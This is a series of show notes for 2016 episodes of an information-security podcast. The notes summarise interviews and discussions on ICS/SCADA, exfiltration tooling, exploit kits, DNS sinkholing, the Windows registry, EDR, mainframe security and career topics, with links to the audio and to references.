Also, since Ms. Cheryl loves discussing #ICS and #SCADA problems and headaches, we got into the headaches, #challenges, and maybe some 'logical' solutions to fixing SCADA vulns... but does the logical approach work in a business sense?
TiaraCon official site: http://tiaracon.org/
TiaraCon Dates: Thursday Aug 4 - Friday Aug 5
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-028-Cheryl_Biswas_Tiaracon_ICSSCADA_headaches.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-028-cheryl-biswas-discusses/id799131292?i=1000372642921&mt=2
Youtube: https://www.youtube.com/watch?v=vsolDjsz5M4
Published on: July 17, 2016
Mr. Boettcher is back! We talked about his experiences at the #DFIR conference, and we get into a discussion about the gap between when you are doing incident response and when you're doing #digital #forensics. Mr. Boettcher and I discuss what needs to happen before #incident #response is required.
We also discuss the Eleanor malware very briefly, and I talk about finding Platypus, which is a way for you to create OSX application bundles from python/perl/shell scripts.
Platypus: http://sveinbjorn.org/platypus
Eleanor Malware on OSX:
https://www.grahamcluley.com/2016/07/mac-malware-uses-tor-obtain-access-systems/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-027-DFIR_policy_controls.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-027-dfir-conference-dfir/id799131292?i=1000372256055&mt=2
YouTube: https://www.youtube.com/watch?v=RPN0nDGYA5c#action=share
Published on: July 10, 2016
Adam Crompton (@3nc0d3r) and Tyler Robinson (@tyler_robinson) from InGuardians came by to fill in for my co-host this week. We talk about things a company should do to protect themselves against data exfil.
Adam then shows us a tool he's created to help automate data exfil out of an environment. It's called 'Naisho', and if you're taking the 'Powershell for Pentesters' class at DerbyCon, you'll be seeing this again, as Adam will be co-teaching this class with Mick Douglas (@bettersafetynet).
Tyler tells us about using Cobalt Strike for creating persistent connections that are more easily hidden when you are on an engagement.
Adam's demo can be found on our YouTube channel: https://youtu.be/rj--BfCvacY
Tyler's demo of Throwback and using Cobalt Strike can be found on our YouTube Channel:
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-026-exfiltration_techniques-redteaming_vs_pentesting-and-gaining_persistence.mp3
Published on: July 3, 2016
The Windows registry has come a long way from its humble beginnings in #Windows 3.11 (Windows for Workgroups). This week, we discuss the structure of the Windows registry, as well as some of the inner workings of the registry itself.
We also discuss some good places in the registry to look for malware persistence, and some of the key values you can find in the #registry and their meanings. We also discuss what atomicity is and how the registry functions a lot like a database.
And no podcast about Windows #forensics should be done without talking about a tool. Our friend David #Longenecker (@dnlongen on Twitter) created a cross-platform tool that lets you take exports of the registry and analyze them without needing to be physically on the host. You can find reglister here:
http://www.securityforrealpeople.com/2015/08/introducing-new-forensics-tool-reglister.html
We finish up discussing our #DerbyCon giveaways and a peek at what will be a very interesting podcast next week.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-025-Windows_Registry-RunKey_artifacts-finding_where_malware_hides.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-025-windows-registry/id799131292?i=1000371465676&mt=2
Published on: June 27, 2016
We are pleased to introduce Ms. Kim Green (Twitter: @kim1green). She is the CEO of KAZO Security, as well as the CISO/CPO of Zephyr Health, a #SaaS based #Healthcare data #analytics company. She brings over 20 years of experience in healthcare and leadership to help small and medium business companies get help from a #CISO to assist in an advisory role.
Ms. Green also started a bug bounty program at Zephyr Health to assist them in shoring up their application, finding #vulnerabilities that their internal teams may have missed. We are going to discuss with her why they decided to make it a private bug bounty, and what was the result.
https://www.youtube.com/watch?v=GbW777t1tTA -- more about the bug bounty
We also discuss why #HIPAA seems to be so far behind in terms of being able to protect #PHI/#PII, and what, if anything, can be done to fix it.
We finish up discussing a recent news story about how a trainer for the National Football League (#NFL) team Washington Redskins lost a laptop containing the PII and health information of several thousand NFL players. We discuss why they did not violate HIPAA, and what, if anything, they did violate.
iTunes: https://itunes.apple.com/us/podcast/2016-024-kim-green-on-cisoaas/id799131292?i=1000371021883&mt=2
YouTube: https://www.youtube.com/watch?v=F9zvkeuON4I&list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K&index=1
Published on: June 20, 2016
Picture yourself in the middle of a security incident... a malware infection, or hosts on your network that are part of a botnet. You have figured out how the malware is communicating with the command and control servers, but if you just kill the connection, the malware stops functioning. What do you do?
In some cases, you might be able to employ a DNS #sinkhole to route traffic harmlessly to or through a honey network that can be used to further analyze things like #infection vectors, #protocols, commands, and #network movement. You can also use #DNS sinkholing to disable the malware if certain conditions are met.
Like most tools, sinkholing can be used for good, but there are legal issues if it's used incorrectly. We discuss some of the legalities. It won't disable all malware or exploit kits, but for some infections, this is another tool in your toolbox you can employ.
In a continuation from last week's show with Earl Carter about the #Angler #Exploit Kit, we discuss how Angler is able to bypass #EMET and #ASLR protections... https://www.fireeye.com/blog/threat-research/2016/06/angler_exploit_kite.html
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-023-DNS_Sinkholes2.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-023-dns-sinkholing/id799131292?i=1000370572088&mt=2
YouTube: https://youtu.be/67huikA2QFg
Links we used to discuss sinkholing:
Basic sinkhole app using BIND: https://isc.sans.edu/forums/diary/DNS+Sinkhole+ISO+Available+for+Download/9037/
*UPDATED literally hours after I posted this show* Version 2.0 of the DNS sinkhole ISO: https://isc.sans.edu/diary/21153
http://resources.infosecinstitute.com/dns-sinkhole
https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
Blackhole DNS servers -- http://www.malware-domains.com/ or http://www.malwaredomains.com/
http://handlers.dshield.org/gbruneau/sinkhole.htm
Malware blackhole DNS campaign (2013) - http://www.bleepingcomputer.com/forums/t/511780/dns-sinkhole-campaign-underway-for-cryptolocker/
http://someonewhocares.org/hosts/ - massive DNS sinkholing list
Image: https://www.enisa.europa.eu/topics/national-csirt-network/glossary/files/dns_sinkhole
Published on: June 13, 2016
Earl Carter spends all day researching exploit kits and using that information to protect customers from the various malware payloads that spread ransomware. This week we sit down with him to understand the #Angler EK.
He starts us off with a history of where it came from and how it gained so much popularity, evolving from earlier EKs like #BlackHole or WebAttacker. We discuss how it has gone from drive-by downloads, to running only in memory, to being used in malvertising campaigns. We even get to hear about how the creators "rent" out the EK, and how they control the malvertising side as well. Great insights into how the EK ecosystem operates...
We talk about some of the vulns used by exploit kits. Contrary to popular belief, the vulns used don't always have to be 0day. Blue teamers will learn valuable insights into protecting their networks from this EK.
Direct Link:http://traffic.libsyn.com/brakeingsecurity/2016-022-earl_carter_dissects_angler_ek.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-022-earl-carter-dissects/id799131292?i=1000370105193&mt=2
Links referenced during the show:
Earl's slides from Bsides Austin: http://www.slideshare.net/EarlCarter3/bsides-anglerevolution-talk-60408313
http://blog.0x3a.com/post/118366451134/angler-exploit-kit-using-tricks-to-avoid-referrer
http://blogs.cisco.com/security/talos/angler-flash-0-day
http://malware.dontneedcoffee.com/2014/08/angler-ek-now-capable-of-fileless.html
https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
https://hiddencodes.wordpress.com/2015/05/29/angler-exploit-kit-breaks-referer-chain-using-https-to-http-redirection/
https://heimdalsecurity.com/blog/ultimate-guide-angler-exploit-kit-non-technical-people/
Published on: June 6, 2016
Ben Johnson (@chicagoben on Twitter) has spent a good deal of time working on protecting clients' endpoints, from his work at the NSA to being the co-founder of Carbon Black (@carbonblack_inc).
We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTPs (#Tactics, Techniques, and Procedures), and the #Threat #Intelligence industry.
Ben discusses with us the Layered Approach to EDR:
1. Hunting
2. Automation
3. Integration
4. Retrospection
5. Patterns of Attack/Detection
6. Indicator-based detection
7. Remediation
8. Triage
9. Visibility
We also discuss how VirusTotal's changes in policy regarding sharing of information is going to affect the threat intel industry.
Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, about businesses spending too much on shiny boxes instead of people.
Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :(
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2
YouTube: https://youtu.be/I10R3BeGDs4
RSS: http://www.brakeingsecurity.com/rss
Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info)
https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016
Published on: May 29, 2016
Dr. Matt Miller is a professor at the University of Nebraska at Kearney. We had him on to discuss a matter that seems to weigh heavily on the infosec community. What will a CS degree get you? What are you learning these days as a future code jockey? Is skipping college altogether better?
We discuss what he does to arm future developers with the tools necessary to get a job. We also hear about what they might be lacking.
Dr. Miller is also spearheading a new cybersecurity degree track at his university. We discuss what it's like to head that up, and we even get into a bit of discussion on Assembly language.
ASM book used in the above class: http://www.drpaulcarter.com/pcasm/
Download here: http://www.drpaulcarter.com/pcasm/pcasm-book-pdf.zip
We also discuss free alternatives for learning out there, and how effective they are.
Show notes: https://docs.google.com/document/d/1Grimx_OCSURTktzM5QRKqsG9p9G5LljdleplH1DZQv4/edit?usp=sharing
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-020-College_vs_Certs_vs_self-taught.mp3
YouTube Playlist: https://www.youtube.com/playlist?list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K
RSS FEED: http://www.brakeingsecurity.com/rss
Dr. Miller's CSIT-301 course on Assembly: https://www.youtube.com/playlist?list=PLSIXOsmf9b5WxCMrt9LuOigjR9qMCRrAC
#Twitter: @brakesec @boettcherpwned @bryanbrake @milhous30
Published on: May 21, 2016
Procurement is a process. Often a long, drawn-out, tedious process, but it is necessary to ensure that hardware and software is going to be what works in your organization.
We go over what is necessary to make sure your procurement is as smooth as possible. Some of the topics we discuss include:
1. Aligning business goals and operational goals
2. How to discuss ROI with management
3. Getting actionable information for business requirements from affected parties
4. Steering yourself away from confirmation bias or optimism bias, and ensuring you're thinking critically when comparing the current status quo vs. a new solution
5. Information you might want to gather from potential vendors to make a more informed decision as to whether their product is the one you want
And finally, we discuss how to handle the dreaded vendor demos. There may be a number of them, and they are arguably the best method of knowing whether the software or hardware is going to work for you.
This is a topic that affects everyone, whether you are a manager, or a user of the technology involved.
We also like to remind people that our DerbyCon CTF and raffle are still going on. There is plenty of time to get involved if you want a chance to get a ticket to Derbycon 2016!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-019-business_cases_and_justifications-final.mp3
YouTube Link: https://youtu.be/8sWn1IYpgtY
Links referred to in the show:
http://www.ask.com/business-finance/business-justification-example-cdebe6f929949e8c
http://www.iso20022.org/documents/BJ/BJ044/ISO20022BJ_ATICA_v4_with_comments.pdf
http://klariti.com/business-case-2/business-case-justify-business-need/
https://en.wikipedia.org/wiki/Business_case
https://en.wikipedia.org/wiki/Optimism_bias
http://www.ehow.com/how_6672801_write-business-justification.html
http://www.acqnotes.com/acqnote/careerfields/establishing-software-requirements
Published on: May 16, 2016
Windows has all the tools you need to secure an OS, but we rarely use them. One example of this is 'Software Restriction Policies', a mechanism by which you can block certain files from being saved anywhere, control which file types can be executed from a directory, and even decide whether software is allowed to install.
We also discuss the use of parental controls as a cheap, easy method of restricting users from accessing certain websites, installing software from the iTunes store, or using certain functions or applications.
Also, the 2nd clue for our CTF can be found in this podcast... see if you can find the giant clue... :)
**NOTE: We had an issue with Mr. Boettcher's Windows 10 install, he's using Windows 10 Home, which does not appear to have Applocker or Software Restriction Policy by default. So, I cut a lot of us bickering^H^H^H^H discussing how to get it to work, so the middle around 25:00 mark will feel a tad off. Apologies... I should have stopped recording.
Links referred to during the podcast:
https://technet.microsoft.com/en-us/library/hh831534.aspx
http://mechbgon.com/srp/ - LOL, mentions the use of ‘parental controls’ to restrict systems
http://www.instructables.com/id/Getting-past-Software-Restriction-Policies/
http://www.itingredients.com/how-to-deploy-software-restriction-policy-gpo/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-018-software_restriction_policy-applocker.mp3
#iTunes Link: https://itunes.apple.com/us/podcast/2016-018-software-restriction/id799131292?i=1000368338483&mt=2
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Published on: May 9, 2016
You might have heard "Network when you can, not when you have to..." The art of networking is creating connections and nurturing relationships that benefit everyone. This week we discuss building networks: creating people networks that allow for the free sharing of ideas and knowledge, whether it be a professional organization like ISSA or ISC2 meetings, or just getting a bunch of people together to have coffee on a Saturday morning.
We also brainstorm ideas on how people in our community keep their skills sharp, and why some seem to let them atrophy once they get a specific certification or degree. We cite examples of things and actions that allow you to gain more knowledge, and to ensure your company will still see you as an SME. CPEs can be gained in the simplest of ways. Just by listening to this podcast, for example, you can receive one CPE (1 hour = 1 CPE). There are many other ways of getting them, and we cite several in this podcast.
We also discuss the continued use of unsalted, weakly hashed passwords in systems, and why a recent breach of a custom Minecraft implementation allowed it to occur.
Story: http://news.sky.com/story/1687550/minecraft-hack-exposes-seven-million-passwords
But I think the most exciting part of the podcast is the announcement of the 1st annual Brakeing Down Security Podcast CTF! The details can be found in the podcast.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-017-Networking-Podcast_CTF-salted_hashes.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-017-art-networking-salted/id799131292?i=367885714&mt=2
Published on: May 2, 2016
Angler, Phoenix, Zeus... all famous exploit kits that are used to move malware into your environment. This week, Mr. Boettcher and I discuss the merits of exploit kits, how they function, and what can be done to stop them. They are only getting more numerous, and they will be serving more malware in the future.
We shift gears and discuss the 'talent gap' the media keeps bringing up, and whether it's perceived or real. We discuss the industry as a whole, and what caused the gap, and if it will get better...
*BONUS*... after the audio, listen to me (Bryan) failing at understanding buffer overflow exercises I'm doing as part of my #OSCP certification...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-016.-Exploit_kits_Talent_Gaps_and_buffer_overflows.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-016-exploit-kits-talent/id799131292?i=367465364&mt=2
Published on: April 25, 2016
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-015-Dr._Hend_Ezzeddine_and_finding_security_training_that_works.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2016-015-dr.-hend-ezzeddine/id799131292?i=366936677&mt=2
Dr. Ezzeddine's slides from Bsides Austin (referenced during the interview): https://drive.google.com/file/d/0B-qfQ-gWynwiQnBXMnJVeko4M25pdk1Sa0JnMGJrZmltWlRr/view?usp=sharing
You open the flash animation, click click click, answer 10 security questions that your 5-year-old could answer, get your certificate of completion... congratulations, you checked the compliance box...
But what did you learn in that training? If you can't remember the next day, maybe it's because the training failed to resonate with you?
Have you ever heard a red team #pentester say that the weakest link in any business is not the applications, or the hardware, but the people? If they can't find a vulnerability anywhere else, the last vulnerability is the people. One email with a poisoned .docx, and you have a shell into a system...
Targeted trainings, and the use of certain styles of #training (presentations, in-person, hand puppets, etc) can be more effective for certain groups. Also, certain groups should have training based on the threat they might be susceptible to...
Dr. Hend #Ezzeddine came by this week to discuss how she helps #organizations get people to understand security topics and concepts, to create a positive security culture. Maybe even a culture that will not click on that attachment...
**If you are planning on attending "Hack In The Box" in Amsterdam, The Netherlands on 23-27 May 2016, you can receive a 10% discount by entering 'brakesec' at checkout.
Get more information at the "Hack In The Box" conference by visiting:
http://conference.hitb.org/hitbsecconf2016ams/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-014-User_Training_Motivation_and_Languages.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-014-user-training-motivations/id799131292?i=366433676&mt=2
Fresh back from my vacation, Mr. Boettcher and I got to discussing things that have weighed on our minds, and I had a story from my travels that fit in perfectly with our discussion.
What does our industry (infosec practitioners) do to motivate people to be secure? Is it a language barrier? I don't mean Spanish/English, but do we do a good job of speaking "user"? How can we do a better job at that if we find ourselves failing? How can speaking 'manager' or 'VP' help us get the help that we need? For many, it's like the difference in communicating with someone who speaks Mandarin.
We discussed the need to educate people against thumbdrive insertion, even in the face of a study of people inserting random thumbdrives into their computers. We discuss the motivation of users who do so, whether it's altruistic, or malicious:
We discussed an app logic flaw that was found recently in the news:
http://www.digitaltrends.com/mobile/free-pizza/
Which is exactly what we were talking about with Ben Caudill a few weeks ago regarding app logic flaws. This flaw had been in the app for a good long time, and while the security researcher saw fit to report it, keeping it secret could have cost Domino's a lot.
Mr. Boettcher gives us a report of Bsides Austin, and how it's grown in the past few years. We finish up discussing infosec conferences and how they appear to be thriving. Is it good marketing, or are companies finally understanding their importance?
Published on: April 8, 2016
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-013-michael_gough-the_5_Ps.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-013-michael-gough-issm/id799131292?i=365622423&mt=2
We discuss a model that Michael Gough used while he was at HP. The Information Security and Service Management (ISSM) Reference Model can be used to help companies align their IS and IT goals with the business's goals. If you've been a listener of our podcast for a while now, you might have heard our 2-part podcast on ITIL with Tim Wood, which is a service-based approach to aligning your IT and infosec initiatives with your business needs.
From the ISSM whitepaper:
"organizations need to build and run an integrated service management system that addresses security and risk management as well as the regulatory compliance imposed on the agency while ensuring that agreed services are provided to internal and external customers and managed end-to-end.
For agencies and organizations to achieve meaningful service outcomes, technology and agency decision makers need to align their goals and strategies more closely while dealing with an increasing amount of technologies, threats, and regulatory compliance requirements."
We discuss the idea of the "5 P's", which are "Policy, Process, People, Products (or technology), and Proof", and how they are important to the implementation of the #ISSM reference model.
Finally, we discuss a typical engagement using the ISSM model: creating the 7 core components, and then using a maturity model to self-assess your company in an effort to make your internal processes transparent.
Important links:
http://www8.hp.com/h20195/V2/getpdf.aspx/4AA2-2350ENW.pdf?ver=1.0
http://www.digitalgovernment.com/media/Downloads/asset_upload_file772_2477.pdf
https://en.wikipedia.org/wiki/Information_security_management_system
http://www.davebolick.com/SampleNewsletterHPFinancialAdvisor.pdf
http://media.govtech.net/HP_RC_08/Security_RC/ISSM_for_SLG.pdf
Integrating ITIL into infosec: http://traffic.libsyn.com/brakeingsecurity/2015-018-Integrating_infosec_with_ITIL.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-017_ITIL_and_infosec.mp3
#cobit, #cmmi, #maturity model, #ISSM, #ITIL, #Service, #management, #reference model, #ISO, #27002, #27001, CISSP, #podcast, #infosec, #compliance
Published on: March 26, 2016
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-012-Ben_Caudill-Application_Logic_Flaws.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-012-ben-caudill-on-app/id799131292?i=365094523&mt=2
Ever bought "-1" of an item on a retail site? Or been able to skip key areas of an application and bypass authentication, or get past a paywall on a site?
Application logic flaws are often insidious and not easy to find. They often require a bit of work to bypass, and are often missed by testing groups with rigid test plans, because they violate the expected flow of an application. "Why would they do that? That doesn't make any sense..." often precludes the finding of an application logic flaw.
This week, we interview Ben Caudill from Rhino Security, who discusses a logic flaw that could be used to de-anonymize someone by creating fake profiles...
We then discuss how Ben went through contacting the company, what happened after initial disclosure, and how it was fixed.
http://www.theguardian.com/technology/2014/aug/26/secret-app-cyberbullying-security-hackers
#infosec, #podcast, #CISSP, #CPEs, #vulnerability #disclosure, #responsible #disclosure, #application #security, #logic #flaws, Ben #Caudill, #Rhino #Security
Published on: March 19, 2016
Download Here: http://traffic.libsyn.com/brakeingsecurity/2016-011-Hector_Monsegur-bug_bounties-serialization.mp3
iTunes Direct Link: https://itunes.apple.com/us/podcast/2016-011-hector-monsegur-serialization/id799131292?i=364768504&mt=2
Hector Monsegur has had a colorful history. A reformed black hat who went by the name 'Sabu' when he was involved in the hacker collectives "Lulzsec" and "Anonymous", he turned state's evidence for the FBI, working to stop further hacking attempts by the same people he was working with.
https://en.wikipedia.org/wiki/Hector_Monsegur
This week, we got to sit down with Hector to find out what he's been doing in the last few years. Obviously, a regular job in the security realm for a large company is not possible for someone with a past as colorful as Mr. Monsegur's. So we discuss some of the methods he's used to make ends meet.
Which brings us to the topic of bug bounties. Do they accomplish what they set out to do? Are they worth the effort companies put into them? And how do you keep bounty hunters from going rogue and using vulnerabilities found against a company on the side?
In an effort to satisfy my own curiosity, I asked Hector if he could explain what a 'deserialization' vulnerability is, and how it can be used in applications. They are different from your run-of-the-mill, everyday OWASP error, but this vulnerability can totally ruin your day...
Finally, we ask Hector some advice for that 'proto black hat' who is wanting to head down the road that Hector went. The answer will surprise you...
We hope you enjoy this most interesting interview with an enigmatic and controversial person, and hope that the information we provide gives another point of view into the mind of a reformed "black hat" hacker...
#infosec, #blackhat, hector #monsegur, #hacker, #anonymous, #lulzsec, #FBI, #Sabu, #deserialization, #bug #bounties, #hackerone, #bugcrowd, #podcast, #de-serialization, #penetration tests, #social #engineering, #CISSP
Published on: March 14, 2016
DNS... we take it for granted... it's just there. And we only know it's broken when your boss can't get to Facebook.
This week, we discuss the Domain Name System (DNS). We start with a bit of history, talking about the origins of DNS, some of the RFCs involved in its creation, how its hierarchical structure functions to allow resolution to occur, and even why your /etc/hosts is important.
We discuss some of the necessary record types in your DNS zone: MX, ALIAS, CNAME, SOA, TXT, and how DNS is used for non-repudiation in email.
We also touch on how you can use DNS to enumerate an external network presence when you are the red team, and what you should know to make it harder for bad actors to use your external DNS in amplification attacks.
Finally, you can't have a discussion about DNS without talking about how to secure your DNS implementation. So we supply you with a few tips and best practices.
Plenty of informational links down below, including links to the actual RFCs (Request for Comment) which detail how DNS is supposed to function. Think of them as the owner's manual for your car.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-010-DNS_Reconnaissance.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-010-dns-reconnaissance/id799131292?i=364331694&mt=2
Podcast Links we used for information:
http://www.slideshare.net/BizuworkkJemaneh/dns-42357401
300+ million domains registered: https://www.verisign.com/en_US/internet-technology-news/verisign-press-releases/articles/index.xhtml?artLink=aHR0cDovL3ZlcmlzaWduLm13bmV3c3Jvb20uY29tL2FydGljbGUvcnNzP2lkPTIwMTIwNTI%3D
https://technet.microsoft.com/en-us/library/cc770432.aspx
http://security-musings.blogspot.com/2013/03/building-secure-dns-infrastructure.html
http://tldp.org/HOWTO/DNS-HOWTO-6.html
https://en.wikipedia.org/wiki/Domain_Name_System
https://en.wikipedia.org/wiki/DNS_spoofing
http://www.esecurityplanet.com/network-security/how-to-prevent-dns-attacks.html
http://www.thegeekstuff.com/2012/05/ettercap-tutorial/
https://support.google.com/a/answer/48090?hl=en
http://www.ecsl.cs.sunysb.edu/tr/TR187.pdf
https://tools.ietf.org/html/rfc882
https://tools.ietf.org/html/rfc883
https://tools.ietf.org/html/rfc1034
https://tools.ietf.org/html/rfc1035
Published on: March 7, 2016
We've reached peak "Br[i|y]an" this week when we invited our friend Brian Engle on to discuss what his organization does. Brian is the Executive Director of the Retail Cyber Intelligence Sharing Center.
"Created by retailers in response to the increased number and sophistication of attacks against the industry, the R-CISC provides another tool in retailers’ arsenal against cyber criminals by sharing leading practices and threat intelligence in a safe and secure way." -- R-CISC website
To learn more, visit https://r-cisc.org/
We discussed with Brian a bit of the history of the #R-CISC, and why his organization was brought into being. We ask Brian "How do you get companies who make billions of dollars a year to trust another competitor enough to share that they might have been compromised?" "And how do you keep the information sharing generic enough to not out a competitor by name, but still be actionable enough to spur members to do something to protect themselves?"
Other links:
Veris framework Mr. Boettcher mentions: http://veriscommunity.net/
TAXII protocol: https://taxiiproject.github.io/
STIX https://stixproject.github.io/
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-009-brian_engle_rcisc_information_sharing.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-009-brian-engle-information/id799131292?i=364002695&mt=2
#actionable, #brian, #engle, #cissp, #cpes, #data, #financial, #infections, #isac, #malware, #podcast, #rcisc, #retail, #security, #infosec, #threat #intelligence
Photo of Brian Engle courtesy of https://r-cisc.org
**I (Bryan) apologize for the audio. I did what I could to clean it up. Seriously don't know what happened to screw it up that badly. I can only imagine it was bandwidth issues on my Skype connection**
Published on: February 29, 2016
This week's super-sized episode is brought to us thanks to previous guest Cheryl Biswas. You might remember her from our "Shadow IT" (http://brakeingsecurity.com/2015-048-the-rise-of-the-shadow-it) podcast a few months ago. She reached out to us to see if we were interested in doing a podcast on mainframe security with her and a couple of gentlemen who were not unknown to us.
Of course we jumped at the chance! You might know them as @mainframed767 and @bigendiansmalls (Chad) on Twitter. They've been trying to get people to look into mainframes and mainframe security for years. Mainframes are usually used by financial organizations, or older organizations. In many cases, these systems are managed by a handful of people, and if you are a red teamer or pentester you will have little or no help in making sure these systems are as secure as they possibly can be.
So, Cheryl (@3ncr1pt3d), @bigendiansmalls, and @mainframed767 (Philip) walk us through how a mainframe functions. We discuss what you might see when a scan occurs, given that it runs a mainframe OS and a Linux 'interface' OS.
We also discuss methods you can use to protect your organization, and methods you can use as a redteamer to learn more about mainframes.
Chad's talk at DerbyCon 2015: https://www.youtube.com/watch?v=b5AG59Y1_EY
Chad discussing mainframe Security on Hak5: https://www.youtube.com/watch?v=YBhsWvlqLPo
Linux for mainframes: http://www-03.ibm.com/systems/linuxone/
Philip's talks on Youtube: https://www.youtube.com/playlist?list=PLBVy6TfEpKmEL56fb5AnZCM8pXXFfJS0n
Brian and I wish to thank Cheryl for all her help in making this happen. You can find her blog over at Alienvault's site... https://www.alienvault.com/blogs/author/cheryl-biswas
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-008-mainframe-security/id799131292?i=363392103&mt=2
Published on: February 22, 2016
We first heard about FingerprinTLS from our friend Lee Brotherston at DerbyCon last September. Very intrigued by how he was able to fingerprint client applications being used, we finally were able to get him on to discuss this.
We do a bit of history about #TLS, and the versions from 1.0 to 1.2.
Lee gives us some examples of how FingerprinTLS might be used by red teamers or pentest agents to see what applications a client has on their system. If you're a blue team with specific application restrictions, you can find out if someone has installed an unauthorized product, or you could even block unknown applications with this method, by sensing the application and then creating an IPS rule from the fingerprint.
Finally, something a bit special... we have a demo on our Youtube site where you can see his application in action!
Video demo: https://youtu.be/im6un0cB3Ns
http://blog.squarelemon.com/tls-fingerprinting/
https://github.com/LeeBrotherston/tls-fingerprinting
http://www.slideshare.net/LeeBrotherston/tls-fingerprinting-sectorca-edition
https://www.youtube.com/watch?v=XX0FRAy2Mec
http://2015.video.sector.ca/video/144175700
Cisco blog on malware using TLS... http://blogs.cisco.com/security/malwares-use-of-tls-and-encryption
iTunes: https://itunes.apple.com/us/podcast/2016-007-fingerprintls-profiling/id799131292?i=362885277&mt=2
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-007-FingerprinTLS_with_Lee_Brotherston.mp3
Published on: February 14, 2016
This week starts with an apology to Michael Gough about comments I (Bryan) mangled on the "Anti-Virus... What is it good for?" podcast. Then we get into the meat of our topic... a person's "Moxie" vs. a mechanism.
Moxie: noun
"force of character, determination, or nerve."
Automation is a great thing. It allows us to do a lot more work with less personnel, run mundane tasks without having to think about them, and even do security scans on web applications and assets in your enterprise.
But is our dependence on these tools making us lazy, or giving us a false sense of security? What is the 'happy medium' we should find when deciding whether to spend the GDP of a small country on the latest compliance-busting tool, or spend the necessary Operational Expenditure (OpEx) on a couple of junior personnel or a seasoned professional?
Mr. Boettcher and I discuss over-reliance, blindly trusting results, and what can happen when you have too much automation, and not enough people around to manage those tools.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-006-Moxie_vs_Mechanism-dependence_on_tools.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-006-moxie-vs-mechanism/id799131292?i=362373544&mt=2
Published on: February 8, 2016
After we interviewed Jay Schulman on our podcast, Mr. Boettcher and I did his podcast! Listen to both of us share our bios and learn how Mr. Boettcher and I met, and how our unorthodox ways of getting into information security can show that anyone can move into that space...
https://www.jayschulman.com/episode15/
Jay has conducted other interviews with some great people, and he creates some great blog posts. Please check out his site at https://www.jayschulman.com
You can also hear us discuss BSIMM and learn a bit more about Jay from our podcast as well...
http://brakeingsecurity.com/2016-001-jay-schulmann-explains-bsimm-usage-in-the-sdlc
Published on: February 3, 2016
Brakeing Down Security had the pleasure of having Patrick Heim join us to discuss a number of topics:
Cloud migrations
What stops many traditional #companies from moving into #cloud based operations? What hurdles do they face, and what are some pitfalls that can hamper a successful #migration?
We touched briefly on #BYOD and the use of personal devices in a business environment, as well as #Dropbox's deployment of optional #2FA and using #U2F keys for additional #authentication measures.
Finally, as an established leader at several major #companies, we pick Mr. #Heim's brain about the qualities of a leader. Can you self-diagnose whether you'll be a good manager? And what does Mr. Heim look for when hiring qualified candidates?
It was a pleasure having Mr. Patrick Heim on and Brakeing Down #Security thanks him for his valuable time.
Some #articles we drew upon for questions to ask Mr. Heim:
http://blogs.wsj.com/cio/2015/05/01/dropbox-is-not-part-of-security-problem-says-new-security-chief/
#iTunes: https://itunes.apple.com/us/podcast/2016-005-dropbox-chief-trust/id799131292?i=361604379&mt=2
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-005-Dropbox_Chief_of_Security_and_Trust_Patrick_Heim.mp3
Patrick Heim image courtesy of darkreading.com
Published on: January 30, 2016
BrakeSec Podcast welcomes Bill Gardner this week! Author, InfoSec Convention Speaker, and fellow podcaster...
We break a bit from our usual rigid methods, and have a good ol' jam session with Bill this week. We talk about vulnerability management, career management, the troubles of putting together a podcast and more!
Bill's Twitter: https://www.twitter.com/oncee
Bill's books he's authored or co-authored: http://www.amazon.com/Bill-Gardner/e/B00MZ9P0IG/ref=sr_ntt_srch_lnk_2?qid=1453607145&sr=1-2
(non-sponsored link)
